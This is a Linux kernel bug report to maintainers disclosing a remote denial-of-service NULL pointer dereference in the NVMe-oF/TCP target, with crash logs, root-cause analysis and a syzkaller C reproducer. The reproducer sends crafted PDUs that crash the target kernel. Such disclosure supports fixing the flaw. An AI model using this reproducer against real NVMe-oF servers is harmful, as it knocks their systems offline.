[Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_build_iovec`

Alon Zahavi zahavi.alon at gmail.com
Mon Nov 6 05:40:49 PST 2023


# Bug Overview

## The Bug
A NULL pointer dereference in `nvmet_tcp_build_pdu_iovec`.

## Bug Location
`drivers/nvme/target/tcp.c`, in the function `nvmet_tcp_build_pdu_iovec`.

## Bug Class
Remote Denial of Service

## Disclaimer:
This bug was found using Syzkaller with added NVMe-oF/TCP support.

# Technical Details

## Kernel Report - NULL Pointer Dereference
```
[  157.833470] BUG: kernel NULL pointer dereference, address: 000000000000000c
[  157.833478] #PF: supervisor read access in kernel mode
[  157.833484] #PF: error_code(0x0000) - not-present page
[  157.833490] PGD 126e40067 P4D 126e40067 PUD 130d16067 PMD 0
[  157.833506] Oops: 0000 [#1] PREEMPT SMP NOPTI
[  157.833515] CPU: 3 PID: 3067 Comm: kworker/3:3H Kdump: loaded Not tainted 6.5.0-rc1+ #5
[  157.833525] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
[  157.833532] Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
[  157.833546] RIP: 0010:nvmet_tcp_build_pdu_iovec+0x7a/0x120
[  157.833558] Code: fe 44 89 a3 20 02 00 00 49 c1 e4 05 4c 03 63 30 4c 89 75 d0 41 89 c6 e8 34 b8 18 ff 45 85 ff 0f 84 99 00 00 00 e8 06 bd 18 ff <41> 8b 74 24 0c 41 8b 44 24 08 4c 89 e7 49 8b 0c 24 89 f2 41 89 75
[  157.833568] RSP: 0018:ffffc9001ab83c28 EFLAGS: 00010293
[  157.833576] RAX: 0000000000000000 RBX: ffff88812b9583e0 RCX: 0000000000000000
[  157.833584] RDX: ffff888131b10000 RSI: ffffffff82191dda RDI: ffffffff82191dcc
[  157.833591] RBP: ffffc9001ab83c58 R08: 0000000000000005 R09: 0000000000000000
[  157.833598] R10: 0000000000000007 R11: 0000000000000000 R12: 0000000000000000
[  157.833605] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000007
[  157.833612] FS:  0000000000000000(0000) GS:ffff888233f80000(0000) knlGS:0000000000000000
[  157.833630] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  157.833638] CR2: 000000000000000c CR3: 0000000122dd4002 CR4: 00000000007706e0
[  157.833659] PKRU: 55555554
[  157.833686] Call Trace:
[  157.833691]  <TASK>
[  157.833712]  ? show_regs+0x6e/0x80
[  157.833745]  ? __die+0x29/0x70
[  157.833757]  ? page_fault_oops+0x278/0x740
[  157.833784]  ? up+0x3b/0x70
[  157.833835]  ? do_user_addr_fault+0x63b/0x1040
[  157.833846]  ? __sanitizer_cov_trace_const_cmp4+0x1a/0x20
[  157.833862]  ? irq_work_queue+0x95/0xc0
[  157.833874]  ? exc_page_fault+0xcf/0x390
[  157.833889]  ? asm_exc_page_fault+0x2b/0x30
[  157.833925]  ? nvmet_tcp_build_pdu_iovec+0x7a/0x120
[  157.833958]  ? nvmet_tcp_build_pdu_iovec+0x6c/0x120
[  157.833971]  ? nvmet_tcp_build_pdu_iovec+0x7a/0x120
[  157.833998]  ? nvmet_tcp_build_pdu_iovec+0x7a/0x120
[  157.834011]  nvmet_tcp_try_recv_pdu+0x995/0x1310
[  157.834066]  nvmet_tcp_io_work+0xe6/0xd90
[  157.834081]  process_one_work+0x3da/0x870
[  157.834112]  worker_thread+0x67/0x640
[  157.834124]  kthread+0x164/0x1b0
[  157.834138]  ? __pfx_worker_thread+0x10/0x10
[  157.834148]  ? __pfx_kthread+0x10/0x10
[  157.834162]  ret_from_fork+0x29/0x50
[  157.834180]  </TASK>
```

## Description

### Tracing The Bug
As written above, the bug occurs during the execution of
`nvmet_tcp_build_pdu_iovec`. From the kernel log we can identify
the exact line of code that triggers the bug.

Code Block 1:
```
static void nvmet_tcp_build_pdu_iovec(struct nvmet_tcp_cmd *cmd)
{
  ...
  sg = &cmd->req.sg[cmd->sg_idx]; // #1

  while (length) {
    u32 iov_len = min_t(u32, length, sg->length - sg_offset); // #2
  ...
  }
...
}
```
Breakdown:

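1. The variable `sg` is assigned the value of `&cmd->req.sg[cmd->sg_idx]`.
At the assembly level (Intel syntax):
```
mov    DWORD PTR [rbx+0x220], r12d     ; rbx holds `cmd`; r12d holds the index, stored here (presumably into `cmd->sg_idx`)
shl    r12, 0x5                        ; decoded from the `Code:` bytes (49 c1 e4 05): scale the index by 32 bytes per entry
add    r12, QWORD PTR [rbx+0x30]       ; add `cmd->req.sg`, so r12 = `&cmd->req.sg[cmd->sg_idx]`
```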

However, `cmd->req.sg` is NULL at this point of execution, so `sg`
will point to `0 + cmd->sg_idx * sizeof(struct scatterlist)`. In this
crash R12 is 0 in the register dump, so `sg` itself is NULL; for other
index values it would be a small address that is not accessible either.

2. After the address is stored in `sg`, the driver dereferences it
inside the while loop, when reading `sg->length` (line #2 above).
```
mov    esi, DWORD PTR [r12+0xc]
```
At this point `r12` is 0x0 (see R12 in the register dump), so the CPU
tries to read memory address 0xc. That matches the faulting address
(CR2) in the report and triggers the NULL pointer dereference.


## Root Cause
`req` is initialized in `nvmet_req_init`. However, the sequence
that leads to `nvmet_tcp_build_pdu_iovec` in this flow does not contain
any call to `nvmet_req_init`, so `cmd->req.sg` is still NULL and the
kernel crashes with a NULL pointer dereference. The same flow of
execution can also lead to an uninitialized memory address being
dereferenced, which is undefined behaviour.

## Reproducer
I am adding a reproducer generated by Syzkaller with some
optimizations and minor changes.

```
// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#include <linux/capability.h>

uint64_t r[1] = {0xffffffffffffffff};

void loop(void)
{
  intptr_t res = 0;
  res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
  if (res != -1)
    r[0] = res;
  *(uint16_t*)0x20000100 = 2;
  *(uint16_t*)0x20000102 = htobe16(0x1144);
  *(uint32_t*)0x20000104 = htobe32(0x7f000001);
  syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
  *(uint8_t*)0x200001c0 = 0;
  *(uint8_t*)0x200001c1 = 0;
  *(uint8_t*)0x200001c2 = 0x80;
  *(uint8_t*)0x200001c3 = 0;
  *(uint32_t*)0x200001c4 = 0x80;
  *(uint16_t*)0x200001c8 = 0;
  *(uint8_t*)0x200001ca = 0;
  *(uint8_t*)0x200001cb = 0;
  *(uint32_t*)0x200001cc = 0;
  memcpy((void*)0x200001d0,
         "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
         "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
         "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35"
         "\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
         "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
         "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
         "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86",
         112);
  syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
  *(uint8_t*)0x20000080 = 6;
  *(uint8_t*)0x20000081 = 3;
  *(uint8_t*)0x20000082 = 0x18;
  *(uint8_t*)0x20000083 = 0x1c;
  *(uint32_t*)0x20000084 = 2;
  *(uint16_t*)0x20000088 = 0x5d;
  *(uint16_t*)0x2000008a = 3;
  *(uint32_t*)0x2000008c = 0;
  *(uint32_t*)0x20000090 = 7;
  memcpy((void*)0x20000094, "\x83\x9e\x4f\x1a", 4);
  syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x20000080ul, /*len=*/0x80ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
}
int main(void)
{
  syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  loop();
  return 0;
}
```

### More information
When I try to reproduce the bug, it sometimes shows up as an OOM
(out of memory) panic instead of a null-ptr-deref.
This suggests that another memory corruption may happen before the
NULL dereference. I couldn't find the root cause of the OOM bug, but I
am attaching the kernel log for it below.
```
[    2.075100] Out of memory and no killable processes...
[    2.075107] Kernel panic - not syncing: System is deadlocked on memory
[    2.075303] CPU: 0 PID: 22 Comm: kworker/u2:1 Not tainted 6.5.0-rc1+ #5
[    2.075428] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
[    2.075608] Workqueue: eval_map_wq tracer_init_tracefs_work_func
[    2.075733] Call Trace:
[    2.075786]  <TASK>
[    2.075836]  dump_stack_lvl+0xaa/0x110
[    2.075921]  dump_stack+0x19/0x20
[    2.075997]  panic+0x567/0x5b0
[    2.076075]  ? out_of_memory+0xb01/0xb10
[    2.076167]  out_of_memory+0xb0d/0xb10
[    2.076272]  __alloc_pages+0xe87/0x1220
[    2.076358]  ? mark_held_locks+0x4d/0x80
[    2.076467]  alloc_pages+0xd7/0x200
[    2.076552]  allocate_slab+0x37e/0x500
[    2.076636]  ? mark_held_locks+0x4d/0x80
[    2.076726]  ? __sanitizer_cov_trace_const_cmp4+0x1a/0x20
[    2.076806]  ___slab_alloc+0x9c6/0x1250
[    2.076806]  ? __d_alloc+0x3d/0x2f0
[    2.076806]  kmem_cache_alloc_lru+0x45e/0x5d0
[    2.076806]  ? kmem_cache_alloc_lru+0x45e/0x5d0
[    2.076806]  ? __d_alloc+0x3d/0x2f0
[    2.076806]  __d_alloc+0x3d/0x2f0
[    2.076806]  ? __d_alloc+0x3d/0x2f0
[    2.076806]  d_alloc_parallel+0x75/0x1040
[    2.076806]  ? lockdep_init_map_type+0x50/0x240
[    2.076806]  __lookup_slow+0xf4/0x2a0
[    2.076806]  lookup_one_len+0xde/0x100
[    2.076806]  start_creating+0xaf/0x180
[    2.076806]  tracefs_create_file+0xa2/0x260
[    2.076806]  trace_create_file+0x38/0x70
[    2.076806]  event_create_dir+0x4c0/0x6e0
[    2.076806]  __trace_early_add_event_dirs+0x57/0x100
[    2.076806]  event_trace_init+0xe4/0x160
[    2.076806]  tracer_init_tracefs_work_func+0x15/0x440
[    2.076806]  process_one_work+0x3da/0x870
[    2.076806]  worker_thread+0x67/0x640
[    2.076806]  kthread+0x164/0x1b0
[    2.076806]  ? __pfx_worker_thread+0x10/0x10
[    2.076806]  ? __pfx_kthread+0x10/0x10
[    2.076806]  ret_from_fork+0x29/0x50
[    2.076806]  </TASK>
[    2.076806] ---[ end Kernel panic - not syncing: System is deadlocked on memory ]---
```
If you find out what causes the OOM, please let me know.

## About this report
This report is almost identical to another report I sent you, titled
"[Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in
__nvmet_req_complete". The root cause seems to be the same, and both
bugs sometimes cause an OOM kernel panic. If you think these bugs should
be addressed as one, please let me know.


